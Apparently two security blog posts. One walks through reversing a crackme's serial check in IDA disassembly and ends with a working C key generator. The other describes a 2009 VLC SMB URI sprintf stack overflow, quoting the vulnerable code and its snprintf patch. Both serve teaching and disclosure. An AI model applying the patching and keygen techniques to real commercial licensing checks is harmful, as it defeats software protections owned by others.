.text:00401511 push eax
.text:00401512 push ecx
.text:00401513 call sub_4013D0
.text:00401518 add esp, 0Ch
.text:0040151B test eax, eax
.text:0040151D jz short loc_40152F
.text:0040151F push 0
.text:00401521 push 0
.text:00401523 push offset aSerialIsCorrec ; "Serial is Correct!!!"
.text:00401528 mov ecx, esi
.text:0040152A call ?MessageBoxA@CWnd@@QAEHPBD0I@Z ; CWnd::MessageBoxA(char const *,char const *,uint)
.text:0040152F
Now, EDX contains var_4, EAX the address of the password and ECX the address of the username, and then a call to sub_4013D0 is made with parameters like these: sub_4013D0(&username, &password, var_4). It is noteworthy here that if the rdtsc anti-debugging check had triggered, then var_4 would be set to 12325 instead of the 0 that it normally is. Anyway, keep these in mind and let’s continue with the execution.
After the add esp, 0Ch that cleans up the three arguments, it tests the return value of the sub_4013D0 function. If it returns FALSE, then it will jump to loc_40152F which was demonstrated earlier, it will just terminate the routine. However, if it returns TRUE it will call MessageBoxA(“Serial is Correct!!!”, 0, 0). We have reached our goal! We can now choose the easy path of just patching it and creating a crack file that changes the behavior of that test instruction or its equivalent jz or whatever. But the fun part is to reverse sub_4013D0 and write a nice little key generator. Let’s do this.
It starts like this…
.text:004013D0 sub_4013D0 proc near ; CODE XREF: sub_401490+83p
.text:004013D0
.text:004013D0 Dest = byte ptr -0Ch
.text:004013D0 arg_0 = dword ptr 4
.text:004013D0 arg_4 = dword ptr 8
.text:004013D0 arg_8 = dword ptr 0Ch
.text:004013D0
.text:004013D0 sub esp, 0Ch
.text:004013D3 xor eax, eax
.text:004013D5 xor edx, edx
.text:004013D7 push ebx
.text:004013D8 push esi
.text:004013D9 mov esi, [esp+14h+arg_0]
.text:004013DD mov cl, [esi]
.text:004013DF test cl, cl
.text:004013E1 jz short loc_401422
.text:004013E3 push edi
.text:004013E4 mov edi, [esp+18h+arg_8]
So, we have our three arguments: username, password and that anti-debugging counter. The routine allocates 12 bytes on the stack and zeroes out EAX and EDX. For convenience I renamed the arguments to user, pass and counter respectively. The next mov instruction stores the address of the username in ESI and the following one uses the lowest byte of ECX (meaning the CL register) to get the first character of the username. If this is NULL (meaning that the test instruction sets the zero flag), it will jump to loc_401422. Otherwise, it will push the current value of EDI on the stack and then load the anti-debugging counter into it. Since our username must have at least 6 characters to pass the check shown earlier, we can move on with the execution knowing that the jump will not be taken. The following code is this:
.text:004013E8 loc_4013E8: ; CODE XREF: sub_4013D0+4Fj
.text:004013E8 movsx ecx, cl
.text:004013EB mov ebx, ecx
.text:004013ED xor ebx, 0C0C0C0C0h
.text:004013F3 sub ebx, edi
.text:004013F5 add ebx, edx
.text:004013F7 imul ebx, eax
.text:004013FA shl ebx, 1
.text:004013FC mov edx, ebx
.text:004013FE lea ebx, [ecx+ecx*4]
.text:00401401 xor edx, ebx
.text:00401403 and ecx, 8000001Fh
.text:00401409 jns short loc_401410
.text:0040140B dec ecx
.text:0040140C or ecx, 0FFFFFFE0h
.text:0040140F inc ecx
Ok… It moves the character of the username stored in CL to ECX in order to be able to perform various operations. For this reason it uses movsx that performs sign extension. It then copies it into EBX and XORs it with 0xC0C0C0C0. It then subtracts from it the anti-debugging counter/value, which is 0 if everything works as expected, and adds EDX (the running result, which is 0 in the first iteration). The next three instructions, imul, shl and mov, multiply EBX by EAX (the character index, which is 0 in the first iteration), double the product and store the result in EDX. The next lea instruction is tricky: it simply multiplies the character in ECX by five and stores that result in EBX. The previous result stored in EDX is then XOR’d with EBX. Next, ECX is masked with 0x8000001F and if the value isn’t negative, it jumps to loc_401410. Otherwise, it decrements ECX, ORs it with 0xFFFFFFE0 and then increments it; together these instructions compute the signed remainder of the character divided by 32. Assuming that we have a positive value, the following code will be executed:
.text:00401410 loc_401410: ; CODE XREF: sub_4013D0+39j
.text:00401410 shl edx, cl
.text:00401412 mov cl, [eax+esi+1]
.text:00401416 xor edx, 0BADDC001h
.text:0040141C inc eax
.text:0040141D test cl, cl
.text:0040141F jnz short loc_4013E8
.text:00401421 pop edi
The first instruction shifts the EDX register left by CL bits, and the next mov instruction retrieves the next character of the username. EDX is then XOR’d with 0xBADDC001 and EAX is incremented. If CL is not NULL it jumps back to loc_4013E8. So.. this is a simple loop. In C this could be represented like:
[sourcecode language="c"]
for (c = *(char *)username; c; ++i) {
    edx = 5 * c ^ 2 * i * (edx + (c ^ 0xC0C0C0C0) - counter);
    ecx = c & 0x8000001F;
    if (ecx < 0)
        ecx = ((--ecx) | 0xFFFFFFE0) + 1;
    edx = edx << ecx;
    c = *(char *)(i + username + 1);
    edx = edx ^ 0xBADDC001;
}
[/sourcecode]

With this in mind we can move on with this routine. The next code is fairly simple...

[sourcecode language="c"]
.text:00401422 loc_401422: ; CODE XREF: sub_4013D0+11j
.text:00401422 push edx
.text:00401423 lea eax, [esp+18h+Dest]
.text:00401427 push offset Format ; "%08X"
.text:0040142C push eax ; Dest
.text:0040142D call ds:sprintf
.text:00401433 mov esi, [esp+20h+pass]
.text:00401437 add esp, 0Ch
.text:0040143A lea eax, [esp+14h+Dest]
[/sourcecode]

What it does is basically sprintf(Dest, "%08X", edx), so the computed value is written to Dest as eight hex digits. A pointer to the password entered by the user is then loaded into ESI and the address of the generated string (Dest) into EAX. So, in C this code would be:

[sourcecode language="c"]
sprintf(dest, "%08X", edx);
esi = password;
eax = dest;
[/sourcecode]

And let's move to the next disassembled code...

[sourcecode language="c"]
.text:0040143E loc_40143E: ; CODE XREF: sub_4013D0+90j
.text:0040143E mov dl, [eax]
.text:00401440 mov bl, [esi]
.text:00401442 mov cl, dl
.text:00401444 cmp dl, bl
.text:00401446 jnz short loc_401473
.text:00401448 test cl, cl
.text:0040144A jz short loc_401462
[/sourcecode]

It moves the first character of the dest string into DL and the first character of the password into BL. It then copies DL into CL and compares DL (aka the dest string character) with BL (the password character). If they are not equal it jumps to loc_401473. If they are equal, it checks whether the dest character in CL is NULL, and if it is, it jumps to loc_401462.
The code continues like this:

[sourcecode language="c"]
.text:0040144C mov dl, [eax+1]
.text:0040144F mov bl, [esi+1]
.text:00401452 mov cl, dl
.text:00401454 cmp dl, bl
.text:00401456 jnz short loc_401473
.text:00401458 add eax, 2
.text:0040145B add esi, 2
.text:0040145E test cl, cl
.text:00401460 jnz short loc_40143E
[/sourcecode]

It compares the next pair of characters in the same way and then advances both pointers by two so that they point to the following characters. It keeps iterating over this loop until it reaches the end of the string, meaning CL is NULL. In C this could be written like:

[sourcecode language="c"]
for (;;) {
    dl = dest[0];
    bl = password[0];
    cl = dl;
    if (dl != bl)
        goto loc_401473;
    if (cl == 0)
        goto loc_401462;
    dl = dest[1];
    bl = password[1];
    cl = dl;
    if (dl != bl)
        goto loc_401473;
    dest += 2;
    password += 2;
    if (cl == 0)
        break; /* falls through to loc_401462 */
}
[/sourcecode]

So.. that's it! By the way, if you single step you can check out the value that sprintf stored in dest. This is the password we're looking for. In my case (user: AAAAAAAA) that was 7A603C5B:

[sourcecode language="c"]
Stack[00000D54]:0012F83C Dest db 37h
Stack[00000D54]:0012F83D db 41h ; A
Stack[00000D54]:0012F83E db 36h ; 6
Stack[00000D54]:0012F83F db 30h ; 0
Stack[00000D54]:0012F840 db 33h ; 3
Stack[00000D54]:0012F841 db 43h ; C
Stack[00000D54]:0012F842 db 35h ; 5
Stack[00000D54]:0012F843 db 42h ; B
Stack[00000D54]:0012F844 db 0
[/sourcecode]

And of course the result of entering this is...

<img src="https://xorl.files.wordpress.com/2009/07/2.jpg" alt="crackme2" title="crackme2" width="336" height="258" class="aligncenter size-full wp-image-1015" />

And obviously, with the above knowledge you can easily write a key generator for this application.
Here is mine:

[sourcecode language="c"]
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>

void usage(const char *);

int
main(int argc, char *argv[])
{
    const char *user;
    char pass[9];      /* 8 hex digits + NUL */
    uint32_t edx = 0;  /* running value, EDX in the listing */
    uint32_t i;

    if (argc != 2)
        usage(argv[0]);
    user = argv[1];

    if (strlen(user) < 6) {
        fprintf(stderr, "Username must be more than 5 characters long\n");
        exit(EXIT_FAILURE);
    }

    for (i = 0; user[i] != '\0'; ++i) {
        int32_t ch = (signed char)user[i];   /* movsx ecx, cl */
        uint32_t c = (uint32_t)ch;

        /* the anti-debugging counter is 0 on a clean run, so it is left out */
        edx = (5 * c) ^ (2 * i * (edx + (c ^ 0xC0C0C0C0u)));
        edx <<= (uint32_t)(ch % 32) & 31u;   /* shl edx, cl */
        edx ^= 0xBADDC001u;
    }

    snprintf(pass, sizeof(pass), "%08X", (unsigned int)edx);
    fprintf(stdout, "\nUsername:\t%s\nPassword:\t%s\n", user, pass);
    return 0;
}

void
usage(const char *name)
{
    fprintf(stderr, "Usage: %s <username>\n", name);
    exit(EXIT_FAILURE);
}
[/sourcecode]
Which as you can see here:
It works!
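A closing note on the comparison at loc_40143E: handling two characters per iteration is typical of an inlined strcmp(), so the whole loop boils down to a string equality test. Here is a minimal sketch, assuming that reading is right. compare_unrolled is a made-up name, and the return values simply stand for the "equal" path (loc_401462) and the "mismatch" path (loc_401473).

```c
#include <assert.h>
#include <stddef.h>

/* Mirrors the unrolled loop: two characters are checked per iteration.
 * Returns 1 if the strings are equal, 0 on the first mismatch. */
int compare_unrolled(const char *dest, const char *password)
{
    assert(dest != NULL && password != NULL);

    for (;;) {
        char cl = dest[0];

        if (cl != password[0])
            return 0;          /* jnz short loc_401473 */
        if (cl == '\0')
            return 1;          /* jz short loc_401462 */

        cl = dest[1];
        if (cl != password[1])
            return 0;          /* jnz short loc_401473 */

        dest += 2;
        password += 2;
        if (cl == '\0')
            return 1;          /* loop ends, equal */
    }
}
```

Under that assumption, compare_unrolled(dest, password) returns 1 exactly when strcmp(dest, password) == 0, which is why entering the string generated by sprintf is all it takes.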
VLC SMB URI Remote Stack Buffer Overflow
This vulnerability was disclosed on 24 June 2009 and affects VLC player up to the 0.9.9a release (the latest at the time of writing). Here is the vulnerable code as seen in modules/access/smb.c.
[sourcecode language="c"]
#ifdef WIN32
static void Win32AddConnection( access_t *p_access, char *psz_path,
                                char *psz_user, char *psz_pwd,
                                char *psz_domain )
{
    DWORD (*OurWNetAddConnection2)( LPNETRESOURCE, LPCTSTR, LPCTSTR, DWORD );
    char psz_remote[MAX_PATH], psz_server[MAX_PATH], psz_share[MAX_PATH];
...
    sprintf( psz_remote, "\\\\%s\\%s", psz_server, psz_share );
...
    FreeLibrary( hdll );
}
#endif // WIN32
[/sourcecode]
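As you can easily see, this affects only the Windows platform and it is a classic sprintf overflow in psz_remote, which has a size of MAX_PATH. psz_server and psz_share are themselves MAX_PATH-sized buffers, so the two of them plus the backslashes may not fit in the destination. An attacker can trick the victim into opening a malicious SMB share using VLC to execute arbitrary code. The patch that fixes this bug is: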
[sourcecode language="diff"]
     }
-    sprintf( psz_remote, "\\\\%s\\%s", psz_server, psz_share );
+    snprintf( psz_remote, sizeof( psz_remote ), "\\\\%s\\%s", psz_server, psz_share );
     net_resource.lpRemoteName = psz_remote;
[/sourcecode]
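To see what the bounded call buys, here is a small standalone sketch. build_unc_path is a hypothetical helper and not part of VLC. It also checks the return value of snprintf to detect truncation, which is an extra step of this sketch; the patch above only bounds the write.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not VLC code): builds "\\server\share" in out.
 * Returns 1 if the whole string fit, 0 if it was truncated or on error. */
int build_unc_path(char *out, size_t out_size,
                   const char *server, const char *share)
{
    int needed;

    assert(out != NULL && out_size > 0);

    /* snprintf never writes more than out_size bytes, NUL included */
    needed = snprintf(out, out_size, "\\\\%s\\%s", server, share);

    return needed >= 0 && (size_t)needed < out_size;
}
```

With a 16-byte buffer, build_unc_path(buf, sizeof(buf), "host", "share") fits and returns 1, while an overlong server name is cut off at 15 characters plus the terminating NUL instead of running past the end of the buffer as it would with sprintf.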